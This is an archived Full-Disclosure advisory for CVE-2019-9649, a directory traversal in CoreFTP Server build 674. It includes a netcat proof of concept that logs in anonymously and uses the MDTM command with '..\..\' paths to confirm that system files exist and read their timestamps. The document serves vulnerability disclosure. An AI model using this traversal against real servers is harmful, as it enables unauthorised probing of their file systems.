| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAM-upGq_SJ0u_ri7JHV1XYYP=3BGfwcGm90_m7v=_6989nqDZw@mail.gmail.com> Date: Mon, 11 Mar 2019 13:30:03 -0400 From: Kevin R <krandall2013@...il.com> To: fulldisclosure@...lists.org Subject: [FD] CVE-2019-9649 CoreFTP FTP / SFTP Server v2 - Build 674 MDTM Directory Traversal CVE-2019-9649 CoreFTP FTP / SFTP Server v2 - Build 674 MDTM Directory Traversal Discovered By: Kevin Randall Summary: By utilizing a directory traversal along with the FTP MDTM command, an attacker can browse outside the root directory to determine if a file exists based on return file size along with the date the file was last modified by using a ..\..\ technique Tools used: Parrot OS VM Windows 7 VM FTP / SFTP Server v2 - Build 674 Netcat Proof of Concept (PoC): File 1: ARP.exe Type of file: Application(.EXE) Description: TCP/IP Arp Command Location: C:\Windows\System32\ Size: 20.5 KB (20,992 bytes) Size on disk: 24.0 KB (24,576 bytes) Created: Monday July 13, 2009 7:55:11 PM Modified: Monday July 13, 2009, 9:14:12 PM Accessed: Monday July 13, 2009 7:55:11 PM #nc -nv 192.168.0.2 21 (UNKNOWN) [192.168.0.2] 21 (ftp) open 220 Core FTP Server Version 2.0, build 674, 32-bit, installed 1 days ago Unregistered USER anonymous 331 password required for anonymous PASS anonymous@ 230-Logged on 230 MDTM C:\..\..\..\..\..\..\Windows\System32\ARP.exe 213 20090713211412 _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists